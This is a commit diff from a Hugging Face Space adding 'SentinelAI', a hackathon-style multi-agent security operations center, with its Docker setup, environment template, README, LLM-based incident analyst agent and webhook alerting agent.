iitian Cursor commited on
Commit
8b3905d
·
1 Parent(s): 6eea8b2

Sync SentinelAI project and add Hugging Face Docker Space layout.

Browse files
This view is limited to 50 files because it contains too many changes.   See raw diff
Files changed (50) hide show
  1. .dockerignore +17 -0
  2. .env.example +58 -0
  3. .gitignore +14 -0
  4. Dockerfile +29 -0
  5. README.md +188 -1
  6. agents/__init__.py +1 -0
  7. agents/ai_analyst_agent.py +247 -0
  8. agents/alerting_agent.py +94 -0
  9. agents/incident_correlation_agent.py +90 -0
  10. agents/normalization_agent.py +44 -0
  11. agents/pentest_assistant.py +14 -0
  12. agents/remediation_agent.py +71 -0
  13. agents/risk_scoring_agent.py +46 -0
  14. agents/threat_detection_agent.py +119 -0
  15. agents/threat_enrichment_agent.py +121 -0
  16. api/.gitkeep +0 -0
  17. backend/__init__.py +0 -0
  18. backend/app/__init__.py +0 -0
  19. backend/app/main.py +304 -0
  20. collectors/__init__.py +1 -0
  21. collectors/collector_agent.py +147 -0
  22. components/.gitkeep +0 -0
  23. database/__init__.py +1 -0
  24. database/models.py +61 -0
  25. database/session.py +35 -0
  26. demo_logs/auth_demo.log +7 -0
  27. docker/Dockerfile.backend +21 -0
  28. docker/Dockerfile.frontend +22 -0
  29. docker/docker-compose.yml +69 -0
  30. docs/DEMO_SCRIPT.md +52 -0
  31. docs/PITCH.md +28 -0
  32. docs/RECORDING_CHECKLIST.md +26 -0
  33. frontend/.gitignore +41 -0
  34. frontend/.nvmrc +1 -0
  35. frontend/README.md +36 -0
  36. frontend/components.json +25 -0
  37. frontend/eslint.config.mjs +25 -0
  38. frontend/next.config.ts +13 -0
  39. frontend/package-lock.json +0 -0
  40. frontend/package.json +40 -0
  41. frontend/postcss.config.mjs +5 -0
  42. frontend/public/file.svg +1 -0
  43. frontend/public/globe.svg +1 -0
  44. frontend/public/next.svg +1 -0
  45. frontend/public/vercel.svg +1 -0
  46. frontend/public/window.svg +1 -0
  47. frontend/run-dev.sh +13 -0
  48. frontend/src/app/favicon.ico +0 -0
  49. frontend/src/app/globals.css +182 -0
  50. frontend/src/app/layout.tsx +33 -0
.dockerignore ADDED
@@ -0,0 +1,17 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ .git
2
+ .gitattributes
3
+ .venv
4
+ .venv_py314
5
+ __pycache__
6
+ *.pyc
7
+ .pytest_cache
8
+ .mypy_cache
9
+ .ruff_cache
10
+ chroma_data
11
+ .env
12
+ frontend/node_modules
13
+ frontend/.next
14
+ *.log
15
+ import_profile*.txt
16
+ import_p3.txt
17
+ .tmp_import.log
.env.example ADDED
@@ -0,0 +1,58 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Core services
2
+ DATABASE_URL=postgresql+asyncpg://sentinel:sentinel@localhost:5432/sentinelai
3
+ REDIS_URL=redis://localhost:6379/0
4
+ SKIP_DB=1
5
+ # AsyncPG connect timeout (seconds) when PostgreSQL is unreachable — avoids long hangs
6
+ DB_CONNECT_TIMEOUT_SEC=10
7
+ CORS_ORIGINS=http://localhost:3000
8
+
9
+ # Collectors
10
+ COLLECTOR_WATCH_DIR=./demo_logs
11
+ COLLECTOR_POLL_SEC=1.0
12
+ COLLECTOR_MISSING_RETRY_SEC=10
13
+ COLLECTOR_HOSTNAME=edge-01
14
+ COLLECTOR_FILE_PATHS=
15
+ COLLECT_AUTH_LOG=0
16
+ AUTH_LOG_PATH=/var/log/auth.log
17
+
18
+ ENABLE_MOCK_CLOUD_POLL=1
19
+
20
+ # LangGraph compile dry-run runs in the background after startup (optional skip / timeout)
21
+ # SKIP_LANGGRAPH_WARMUP=1
22
+ # LANGGRAPH_WARMUP_TIMEOUT_SEC=120
23
+
24
+ AUTO_AI_ON_INCIDENT=1
25
+ AUTO_AI_MIN_SEC=75
26
+
27
+ # Local LLM (Ollama)
28
+ OLLAMA_HOST=http://localhost:11434
29
+ OLLAMA_MODEL=llama3
30
+
31
+ # OpenAI-compatible inference (vLLM, Fireworks, OpenAI, etc.)
32
+ # Must be the INFERENCE base URL — not http://localhost:8000 (that is this app’s API).
33
+ # Fireworks example: https://api.fireworks.ai/inference/v1
34
+ VLLM_BASE_URL=
35
+ VLLM_API_KEY=
36
+ # Fireworks example: accounts/fireworks/models/deepseek-v4-pro
37
+ SENTINEL_LLM_MODEL=llama3
38
+ OPENAI_BASE_URL=
39
+ OPENAI_API_KEY=
40
+ LLM_TEMPERATURE=0.2
41
+ LLM_MAX_TOKENS=4096
42
+ # Optional Fireworks-style sampling: LLM_TOP_P=1 LLM_TOP_K=40
43
+
44
+ # Optional threat intel
45
+ ABUSEIPDB_API_KEY=
46
+ VIRUSTOTAL_API_KEY=
47
+ OTX_API_KEY=
48
+
49
+ # Alerting
50
+ SLACK_WEBHOOK_URL=
51
+ DISCORD_WEBHOOK_URL=
52
+ TEAMS_WEBHOOK_URL=
53
+ GENERIC_ALERT_WEBHOOK=
54
+
55
+ # Frontend (Next.js) — also set when running npm run dev
56
+ NEXT_PUBLIC_API_URL=http://localhost:8000
57
+
58
+ CHROMA_PERSIST_DIR=./chroma_data
.gitignore ADDED
@@ -0,0 +1,14 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ .venv/
2
+ .venv_py314/
3
+ __pycache__/
4
+ *.py[cod]
5
+ .pytest_cache/
6
+ .mypy_cache/
7
+ .ruff_cache/
8
+ chroma_data/
9
+ .env
10
+ frontend/.next/
11
+ frontend/node_modules/
12
+ dist/
13
+ *.log
14
+ !demo_logs/auth_demo.log
Dockerfile ADDED
@@ -0,0 +1,29 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Hugging Face Spaces (Docker SDK) — app must listen on 7860.
2
+ # Space has no bundled Postgres/Redis; backend degrades with SKIP_DB / no REDIS_URL.
3
+ FROM python:3.12-slim
4
+
5
+ ENV PYTHONDONTWRITEBYTECODE=1 \
6
+ PYTHONUNBUFFERED=1 \
7
+ PYTHONPATH=/app \
8
+ SKIP_DB=1 \
9
+ SKIP_LANGGRAPH_WARMUP=1 \
10
+ ENABLE_MOCK_CLOUD_POLL=1 \
11
+ COLLECTOR_WATCH_DIR=/app/demo_logs \
12
+ CORS_ORIGINS="*"
13
+
14
+ WORKDIR /app
15
+
16
+ RUN apt-get update && apt-get install -y --no-install-recommends \
17
+ build-essential \
18
+ libpq-dev \
19
+ && rm -rf /var/lib/apt/lists/*
20
+
21
+ COPY requirements.txt /app/requirements.txt
22
+ RUN pip install --no-cache-dir -r /app/requirements.txt
23
+
24
+ COPY . /app
25
+
26
+ RUN mkdir -p /app/demo_logs
27
+
28
+ EXPOSE 7860
29
+ CMD ["uvicorn", "backend.app.main:app", "--host", "0.0.0.0", "--port", "7860"]
README.md CHANGED
@@ -4,9 +4,196 @@ emoji: 🏃
4
  colorFrom: red
5
  colorTo: pink
6
  sdk: docker
 
7
  pinned: false
8
  license: apache-2.0
9
  short_description: SentinelAI — Autonomous Multi-Agent AI SOC
10
  ---
11
 
12
- Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
4
  colorFrom: red
5
  colorTo: pink
6
  sdk: docker
7
+ app_port: 7860
8
  pinned: false
9
  license: apache-2.0
10
  short_description: SentinelAI — Autonomous Multi-Agent AI SOC
11
  ---
12
 
13
+ **This Hugging Face Space** runs the FastAPI control plane in Docker (no bundled PostgreSQL/Redis). The API is served on port **7860**; set `SKIP_DB=1` at build time for demo-grade startup.
14
+
15
+ ---
16
+
17
+ # SentinelAI — Autonomous Multi-Agent AI SOC
18
+
19
+ SentinelAI is a hackathon-grade, production-shaped **autonomous Security Operations Center**. It continuously ingests telemetry through collector agents, normalizes and enriches events, runs multi-modal detection (rules + heuristics + optional LLM reasoning on AMD ROCm), correlates attack chains, scores risk, drafts analyst narratives, emits remediation, and fans out alerts—while a **Next.js 15** command deck visualizes live operations.
20
+
21
+ ## Powered by AMD ROCm compute
22
+
23
+ - **Local open models**: wire `OLLAMA_HOST` to an Ollama instance backed by **AMD ROCm** on Linux (`ollama/ollama:rocm` in `docker/docker-compose.yml` comments).
24
+ - **Parallel agents**: FastAPI + `asyncio` execute enrichment, detection, correlation, and analyst tasks concurrently; GPU inference accelerates the analyst LLM path without shipping prompts to a proprietary SaaS.
25
+ - **Throughput**: ROCm lowers per-token latency for Llama 3, Qwen 2.5, Mistral, or DeepSeek-class models so multiple agents can reason on overlapping incidents.
26
+
27
+ ## Architecture
28
+
29
+ ```mermaid
30
+ flowchart TB
31
+ subgraph Infra[Infrastructure]
32
+ L[Linux auth/syslog]
33
+ D[Docker / K8s / Cloud mocks]
34
+ end
35
+ C[Collector Agent]
36
+ P[Parser Agent]
37
+ N[Normalization Agent]
38
+ E[Threat Enrichment Agent]
39
+ T[Threat Detection Agent]
40
+ G[LangGraph orchestration]
41
+ X[Incident Correlation Agent]
42
+ R[Risk Scoring Agent]
43
+ A[AI Analyst Agent]
44
+ M[Remediation Agent]
45
+ AL[Alerting Agent]
46
+ DB[(PostgreSQL)]
47
+ RD[(Redis)]
48
+ V[(Chroma optional)]
49
+ UI[Next.js 15 Dashboard]
50
+
51
+ Infra --> C
52
+ C --> P --> N --> E --> T
53
+ T --> G
54
+ G --> X --> R --> A --> M
55
+ E -.intel.-> V
56
+ T --> DB
57
+ X --> DB
58
+ AL --> RD
59
+ A --> UI
60
+ T --> UI
61
+ ```
62
+
63
+ ## Repository layout
64
+
65
+ | Path | Role |
66
+ | --- | --- |
67
+ | `frontend/` | Next.js 15 + Tailwind + shadcn + Framer Motion SOC deck |
68
+ | `backend/app/main.py` | FastAPI control plane + WebSockets |
69
+ | `agents/` | Threat, risk, analyst, remediation, alerting logic |
70
+ | `collectors/` | Autonomous async tailing collectors |
71
+ | `parsers/` | Log → structured `SecurityEvent` |
72
+ | `workflows/` | LangGraph multi-agent DAG |
73
+ | `database/` | SQLAlchemy models + async session |
74
+ | `models/` | Shared Pydantic schemas |
75
+ | `services/` | Pipeline, hub, metrics, optional Chroma |
76
+ | `docker/` | Compose + GPU-ready notes |
77
+ | `scripts/` | Demo attack replay |
78
+
79
+ ## Quick start (local)
80
+
81
+ ```bash
82
+ cd SentinelAI
83
+ python3 -m venv .venv && source .venv/bin/activate
84
+ pip install -r requirements.txt
85
+ cp .env.example .env
86
+ # optional: start postgres + redis, or export SKIP_DB=1 for demo-only persistence
87
+ export PYTHONPATH=$PWD
88
+ export SKIP_DB=1 # remove when PostgreSQL is available
89
+ ./scripts/run-backend-dev.sh
90
+ ```
91
+
92
+ Use `./scripts/run-backend-dev.sh` instead of `uvicorn ... --reload` from the repo root: reloading the whole tree also watches `.venv/site-packages` and can restart endlessly. The script scopes `--reload-dir` to Python source folders only.
93
+
94
+ ```bash
95
+ cd frontend
96
+ npm install
97
+ export NEXT_PUBLIC_API_URL=http://127.0.0.1:8000
98
+ npm run dev:22
99
+ ```
100
+
101
+ Use `npm run dev:22` (Node 22) if `npm run dev` fails with a Next.js `semver` error on newer Node versions.
102
+
103
+ Replay the scripted attack chain:
104
+
105
+ ```bash
106
+ python scripts/demo_attack.py
107
+ ```
108
+
109
+ **Continuous demo stream** (keeps generating traffic for judges):
110
+
111
+ ```bash
112
+ python scripts/continuous_demo.py
113
+ ```
114
+
115
+ **Linux auth.log (production-style):** set `COLLECT_AUTH_LOG=1` (and optionally `AUTH_LOG_PATH`) or add paths to `COLLECTOR_FILE_PATHS`. The collector waits until the file exists and tails new lines asynchronously.
116
+
117
+ **Attack replay (WOW):** after traffic has populated the buffer, call `POST /replay/start` with `{"delay_ms": 420}` or use the dashboard **Replay last chain** button to re-broadcast buffered detections/incidents over WebSockets.
118
+
119
+ **vLLM / OpenAI-compatible inference:** set `VLLM_BASE_URL` (or `OPENAI_BASE_URL`) and `SENTINEL_LLM_MODEL` to your served model; analyst reports use `/v1/chat/completions` before falling back to Ollama.
120
+
121
+ The UI listens on `NEXT_PUBLIC_API_URL` and opens a WebSocket to `/live-events`.
122
+
123
+ ## Docker Compose
124
+
125
+ ```bash
126
+ docker compose -f docker/docker-compose.yml up --build
127
+ ```
128
+
129
+ - API: `http://localhost:8000`
130
+ - UI: `http://localhost:3000`
131
+ - Uncomment the `ollama` service for ROCm hosts and align `OLLAMA_HOST`.
132
+
133
+ Install optional vector memory:
134
+
135
+ ```bash
136
+ pip install -r requirements-optional.txt
137
+ ```
138
+
139
+ ## Required API surface
140
+
141
+ | Endpoint | Description |
142
+ | --- | --- |
143
+ | `POST /ingest-logs` | Push raw logs / JSON events |
144
+ | `WS /live-events` | Real-time detections + incidents |
145
+ | `POST /detect-threats` | Parser → enrich → detect |
146
+ | `POST /correlate-incidents` | Recompute chains |
147
+ | `POST /generate-summary` | Body: `{ "incident_id": "..." }` |
148
+ | `POST /remediation` | Body: `{ "incident_id": "..." }` |
149
+ | `POST /send-alert` | Slack / Discord / Teams / webhook |
150
+ | `GET /dashboard-metrics` | KPIs for the deck |
151
+ | `POST /replay/start` | Re-stream buffered threat frames to WebSocket clients |
152
+ | `GET /replay-buffer` | Inspect replay buffer (debug) |
153
+ | `GET /rocm-panel` | AMD ROCm story + simulated GPU/agent load for the UI |
154
+
155
+ ## Open-source model matrix
156
+
157
+ | Role | Suggested weights |
158
+ | --- | --- |
159
+ | Reasoning | Llama 3, Qwen 2.5, DeepSeek, Mistral |
160
+ | Vision (future) | Qwen-VL, LLaVA for phishing/malware screenshots |
161
+ | Embeddings | BGE, E5 (plug into Chroma ingestion) |
162
+
163
+ Set `SENTINEL_LLM_MODEL` to the tag served by your ROCm Ollama runtime.
164
+
165
+ ## Live demo script (judges)
166
+
167
+ 1. **Start stack** — Docker Compose or local `uvicorn` + `npm run dev`.
168
+ 2. **Show autonomous collection** — tail `demo_logs/auth_demo.log` without manual uploads.
169
+ 3. **Fire demo** — `python scripts/demo_attack.py` or the in-UI **Simulate attack chain** button.
170
+ 4. **Narrate agents** — Collector → Parser → Normalization → Enrichment → Detection → LangGraph hop → Correlation → Risk → (optional) Analyst LLM on ROCm.
171
+ 5. **Pivot to response** — call `/remediation` + `/send-alert` with a webhook sink.
172
+ 6. **Close with differentiation** — autonomous agents, not a chatbot; on-prem models on AMD GPUs; evidence in PostgreSQL.
173
+
174
+ ## Pitch deck outline (copy into Slides / Gamma)
175
+
176
+ 1. **Problem** — SOC teams drown in telemetry; correlation is manual; cloud-only AI breaks data residency.
177
+ 2. **Solution** — SentinelAI fuses autonomous collectors, graph-based correlation, and open-weight LLMs.
178
+ 3. **Why now** — AMD ROCm makes on-prem inference cost-viable; LangGraph standardizes agent choreography.
179
+ 4. **Demo** — live WebSocket feed + incident graph + analyst summary.
180
+ 5. **Moat** — modular agents, MITRE mapping, optional TI hooks, Terraform-ready remediation stubs.
181
+ 6. **Ask** — design partners for managed SOC + on-prem appliance.
182
+
183
+ ## Demo & pitch (read before presenting)
184
+
185
+ - **Exact demo steps:** [docs/DEMO_SCRIPT.md](docs/DEMO_SCRIPT.md)
186
+ - **One-line pitch:** [docs/PITCH.md](docs/PITCH.md)
187
+ - **Backup recording:** [docs/RECORDING_CHECKLIST.md](docs/RECORDING_CHECKLIST.md)
188
+ - **AMD panel API:** `GET /rocm-panel` (drives the “Powered by AMD ROCm” dashboard section)
189
+
190
+ ## Judge explanation notes
191
+
192
+ - **Autonomy**: collectors run continuously; pipeline executes without human prompts.
193
+ - **Multi-agent**: LangGraph DAG + discrete services per concern (enrichment vs detection vs correlation).
194
+ - **Enterprise UX**: glassmorphism SOC deck, severity analytics, world heatmap, terminal channel.
195
+ - **Honest scope**: optional APIs (AbuseIPDB, VT, OTX) degrade gracefully; LLM path falls back to deterministic narratives if Ollama is offline.
196
+
197
+ ## Security notice
198
+
199
+ This repository ships **defensive** tooling and demo payloads. Only run against systems you own or have permission to test.
agents/__init__.py ADDED
@@ -0,0 +1 @@
 
 
1
+ """Autonomous SentinelAI security agents."""
agents/ai_analyst_agent.py ADDED
@@ -0,0 +1,247 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """AI Security Analyst — vLLM / OpenAI-compatible, Ollama, or cinematic fallback."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import json
6
+ import logging
7
+ import os
8
+ import re
9
+ from typing import Any
10
+
11
+ import httpx
12
+
13
+ logger = logging.getLogger(__name__)
14
+
15
+ from models.schemas import AnalystReport, Incident, RiskAssessment
16
+
17
+
18
+ async def generate_analyst_report(incident: Incident, risk: RiskAssessment) -> AnalystReport:
19
+ prompt = _build_prompt(incident, risk)
20
+ text: str | None = None
21
+
22
+ vllm_base = (os.getenv("VLLM_BASE_URL") or os.getenv("OPENAI_BASE_URL") or "").strip()
23
+ if vllm_base:
24
+ text = await _openai_compatible_chat(
25
+ vllm_base,
26
+ os.getenv("SENTINEL_LLM_MODEL", "meta-llama/Meta-Llama-3-8B-Instruct"),
27
+ prompt,
28
+ )
29
+
30
+ if not text:
31
+ ollama = os.getenv("OLLAMA_HOST", "http://localhost:11434")
32
+ model = os.getenv("OLLAMA_MODEL", os.getenv("SENTINEL_LLM_MODEL", "llama3"))
33
+ text = await _ollama_generate(ollama, model, prompt)
34
+
35
+ if not text:
36
+ text = _cinematic_fallback_json(incident, risk)
37
+
38
+ parsed = _parse_analyst_json(text, incident, risk)
39
+ return AnalystReport(
40
+ incident_id=incident.id,
41
+ executive_summary=parsed["executive_summary"],
42
+ technical_analysis=parsed["technical_analysis"],
43
+ investigation_notes=parsed["investigation_notes"],
44
+ indicators=_extract_iocs(incident),
45
+ recommended_actions=parsed["recommended_actions"],
46
+ )
47
+
48
+
49
+ def _build_prompt(incident: Incident, risk: RiskAssessment) -> str:
50
+ tl = json.dumps(incident.timeline[:20], default=str)
51
+ return f"""You are a senior SOC analyst writing an executive-ready incident briefing.
52
+
53
+ Output ONLY valid JSON (no markdown fences) with exactly these string keys:
54
+ - "narrative": 2-4 sentences. Opening line MUST start with "SentinelAI detected". Enterprise tone: technical, concise, security-focused. Reference SSH/auth abuse, suspicious IPs, privilege moves, or outbound retrieval when applicable.
55
+ - "progression": numbered step-by-step attack progression (use \\n between steps). Map what likely happened chronologically.
56
+ - "severity_rationale": 2-3 sentences explaining why severity is justified (risk score {risk.risk_score}, label {risk.severity.value}), confidence, and blast radius.
57
+ - "recommended_actions": array of 4-7 short imperative strings (e.g. "Block offending IP at perimeter", "Rotate credentials for affected accounts", "Inspect shell history and authorized_keys", "Enable MFA on privileged users").
58
+
59
+ Incident title: {incident.title}
60
+ Machine summary: {incident.summary}
61
+ Risk: score={risk.risk_score} severity={risk.severity.value}
62
+ Timeline JSON: {tl}
63
+ """
64
+
65
+
66
+ async def _openai_compatible_chat(base_url: str, model: str, prompt: str) -> str | None:
67
+ key = os.getenv("VLLM_API_KEY") or os.getenv("OPENAI_API_KEY") or ""
68
+ headers: dict[str, str] = {
69
+ "Accept": "application/json",
70
+ "Content-Type": "application/json",
71
+ }
72
+ if key:
73
+ headers["Authorization"] = f"Bearer {key}"
74
+ max_tokens = int(os.getenv("LLM_MAX_TOKENS", "4096"))
75
+ payload: dict[str, Any] = {
76
+ "model": model,
77
+ "max_tokens": max_tokens,
78
+ "temperature": float(os.getenv("LLM_TEMPERATURE", "0.2")),
79
+ "messages": [
80
+ {
81
+ "role": "system",
82
+ "content": "You write incident reports as strict JSON only. No markdown.",
83
+ },
84
+ {"role": "user", "content": prompt},
85
+ ],
86
+ }
87
+ _top_p = os.getenv("LLM_TOP_P")
88
+ if _top_p not in (None, ""):
89
+ payload["top_p"] = float(_top_p)
90
+ _top_k = os.getenv("LLM_TOP_K")
91
+ if _top_k not in (None, ""):
92
+ payload["top_k"] = int(_top_k)
93
+ base = base_url.rstrip("/")
94
+ chat_url = f"{base}/chat/completions" if base.endswith("/v1") else f"{base}/v1/chat/completions"
95
+ try:
96
+ async with httpx.AsyncClient(timeout=120.0) as client:
97
+ r = await client.post(
98
+ chat_url,
99
+ headers=headers,
100
+ json=payload,
101
+ )
102
+ if r.status_code != 200:
103
+ logger.warning(
104
+ "OpenAI-compatible chat failed: %s %s",
105
+ r.status_code,
106
+ (r.text or "")[:800],
107
+ )
108
+ return None
109
+ data = r.json()
110
+ choice = (data.get("choices") or [{}])[0]
111
+ msg = choice.get("message") or {}
112
+ content = (msg.get("content") or "").strip()
113
+ return _normalize_llm_json(content)
114
+ except Exception: # noqa: BLE001
115
+ return None
116
+
117
+
118
+ def _normalize_llm_json(content: str) -> str:
119
+ s = content.strip()
120
+ fence = re.match(r"^```(?:json)?\s*([\s\S]*?)```$", s, re.IGNORECASE)
121
+ if fence:
122
+ s = fence.group(1).strip()
123
+ try:
124
+ json.loads(s)
125
+ return s
126
+ except json.JSONDecodeError:
127
+ m = re.search(r"\{[\s\S]*\}", s)
128
+ if m:
129
+ return m.group(0).strip()
130
+ return s
131
+
132
+
133
+ async def _ollama_generate(host: str, model: str, prompt: str) -> str | None:
134
+ try:
135
+ async with httpx.AsyncClient(timeout=120.0) as client:
136
+ r = await client.post(
137
+ f"{host.rstrip('/')}/api/generate",
138
+ json={"model": model, "prompt": prompt, "stream": False},
139
+ )
140
+ if r.status_code != 200:
141
+ return None
142
+ return (r.json().get("response") or "").strip()
143
+ except Exception: # noqa: BLE001
144
+ return None
145
+
146
+
147
+ def _parse_analyst_json(blob: str, incident: Incident, risk: RiskAssessment) -> dict[str, Any]:
148
+ try:
149
+ data = json.loads(blob)
150
+ except json.JSONDecodeError:
151
+ return _cinematic_fallback_dict(incident, risk)
152
+
153
+ narrative = str(data.get("narrative") or data.get("executive") or "").strip()
154
+ progression = str(data.get("progression") or data.get("technical") or "").strip()
155
+ sev = str(data.get("severity_rationale") or data.get("notes") or "").strip()
156
+ actions = data.get("recommended_actions") or data.get("actions") or []
157
+ if isinstance(actions, str):
158
+ actions = [x.strip("- •\t ") for x in actions.split("\n") if x.strip()]
159
+ if not isinstance(actions, list):
160
+ actions = []
161
+ actions = [str(a).strip() for a in actions if str(a).strip()][:12]
162
+
163
+ if not narrative:
164
+ return _cinematic_fallback_dict(incident, risk)
165
+ if not progression:
166
+ progression = _default_progression(incident)
167
+ if not sev:
168
+ sev = _default_severity_rationale(risk)
169
+ if not actions:
170
+ actions = _default_actions()
171
+
172
+ return {
173
+ "executive_summary": narrative,
174
+ "technical_analysis": progression,
175
+ "investigation_notes": sev,
176
+ "recommended_actions": actions,
177
+ }
178
+
179
+
180
+ def _cinematic_fallback_json(incident: Incident, risk: RiskAssessment) -> str:
181
+ d = _cinematic_fallback_dict(incident, risk)
182
+ return json.dumps(
183
+ {
184
+ "narrative": d["executive_summary"],
185
+ "progression": d["technical_analysis"],
186
+ "severity_rationale": d["investigation_notes"],
187
+ "recommended_actions": d["recommended_actions"],
188
+ }
189
+ )
190
+
191
+
192
+ def _cinematic_fallback_dict(incident: Incident, risk: RiskAssessment) -> dict[str, Any]:
193
+ return {
194
+ "executive_summary": (
195
+ f"SentinelAI detected correlated authentication and host telemetry consistent with a targeted intrusion "
196
+ f"chain against assets tied to “{incident.title}”. "
197
+ f"Repeated SSH authentication failures from a concentrated source were followed by successful session "
198
+ f"establishment and privileged execution patterns indicative of post-compromise activity. "
199
+ f"Outbound retrieval-style commands suggest possible payload staging or command-and-control preparation."
200
+ ),
201
+ "technical_analysis": _default_progression(incident),
202
+ "investigation_notes": _default_severity_rationale(risk),
203
+ "recommended_actions": _default_actions(),
204
+ }
205
+
206
+
207
+ def _default_progression(incident: Incident) -> str:
208
+ lines = [
209
+ "1. Reconnaissance / credential spray against SSH surface from a high-velocity source IP.",
210
+ "2. Brute-force or password-spray phase producing clustered authentication failures.",
211
+ "3. Successful authentication — pivot from noise to confirmed access.",
212
+ "4. Privilege escalation via sudo or equivalent administrative channel.",
213
+ "5. Potential exfil or staging via scripted download utilities (e.g. curl/wget) to non-standard paths.",
214
+ ]
215
+ if incident.timeline:
216
+ lines.append(f"6. Correlated timeline contains {len(incident.timeline)} normalized events for graph reconstruction.")
217
+ return "\n".join(lines)
218
+
219
+
220
+ def _default_severity_rationale(risk: RiskAssessment) -> str:
221
+ return (
222
+ f"Severity is driven by a composite risk score of {risk.risk_score}/100 with label {risk.severity.value}. "
223
+ f"The sequence combines authentication abuse with privilege boundary crossing, elevating impact beyond "
224
+ f"nuisance scanning. Confidence reflects rule-and-window correlation across multiple telemetry stages; "
225
+ f"treat as incident-grade until disproven by host forensics."
226
+ )
227
+
228
+
229
+ def _default_actions() -> list[str]:
230
+ return [
231
+ "Block offending IP at perimeter firewall and WAF allowlists",
232
+ "Rotate credentials and invalidate active sessions for implicated accounts",
233
+ "Inspect shell history, authorized_keys, and cron for persistence",
234
+ "Enable or enforce MFA on all break-glass and sudo-capable users",
235
+ "Isolate affected host to a quarantine VLAN for memory and disk capture",
236
+ "Review outbound DNS and proxy logs for matching IOC time windows",
237
+ ]
238
+
239
+
240
+ def _extract_iocs(incident: Incident) -> list[str]:
241
+ iocs: list[str] = []
242
+ for row in incident.timeline:
243
+ msg = str(row.get("msg", ""))
244
+ for token in msg.split():
245
+ if token.count(".") == 3 and token.replace(".", "").isdigit():
246
+ iocs.append(token)
247
+ return list(dict.fromkeys(iocs))[:16]
agents/alerting_agent.py ADDED
@@ -0,0 +1,94 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Alerting agent — Slack, Discord, email, Teams, webhooks."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import os
6
+ from typing import Any
7
+
8
+ import httpx
9
+
10
+ from models.schemas import AlertPayload, Severity
11
+
12
+
13
+ async def send_alert(payload: AlertPayload) -> dict[str, Any]:
14
+ channel = payload.channel.lower()
15
+ if channel == "slack":
16
+ return await _slack(payload)
17
+ if channel == "discord":
18
+ return await _discord(payload)
19
+ if channel == "teams":
20
+ return await _teams(payload)
21
+ if channel == "email":
22
+ return {"status": "queued", "detail": "Configure SMTP — payload logged server-side"}
23
+ if channel == "webhook":
24
+ return await _webhook(payload)
25
+ return {"status": "ignored", "channel": channel}
26
+
27
+
28
+ async def _slack(payload: AlertPayload) -> dict[str, Any]:
29
+ url = os.getenv("SLACK_WEBHOOK_URL")
30
+ if not url:
31
+ return {"status": "skipped", "reason": "SLACK_WEBHOOK_URL not set"}
32
+ body = {
33
+ "text": f"*{payload.title}* [{payload.severity}]\n{payload.body}",
34
+ "attachments": [{"color": _color(payload.severity), "fields": [{"title": "meta", "value": str(payload.metadata)}]}],
35
+ }
36
+ async with httpx.AsyncClient(timeout=10.0) as client:
37
+ r = await client.post(url, json=body)
38
+ return {"status": r.status_code, "channel": "slack"}
39
+
40
+
41
+ async def _discord(payload: AlertPayload) -> dict[str, Any]:
42
+ url = os.getenv("DISCORD_WEBHOOK_URL")
43
+ if not url:
44
+ return {"status": "skipped", "reason": "DISCORD_WEBHOOK_URL not set"}
45
+ async with httpx.AsyncClient(timeout=10.0) as client:
46
+ r = await client.post(
47
+ url,
48
+ json={"content": f"**{payload.title}** ({payload.severity})\n{payload.body}"},
49
+ )
50
+ return {"status": r.status_code, "channel": "discord"}
51
+
52
+
53
+ async def _teams(payload: AlertPayload) -> dict[str, Any]:
54
+ url = os.getenv("TEAMS_WEBHOOK_URL")
55
+ if not url:
56
+ return {"status": "skipped", "reason": "TEAMS_WEBHOOK_URL not set"}
57
+ card = {
58
+ "@type": "MessageCard",
59
+ "@context": "https://schema.org/extensions",
60
+ "summary": payload.title,
61
+ "themeColor": "D83B01",
62
+ "title": payload.title,
63
+ "sections": [{"text": payload.body}],
64
+ }
65
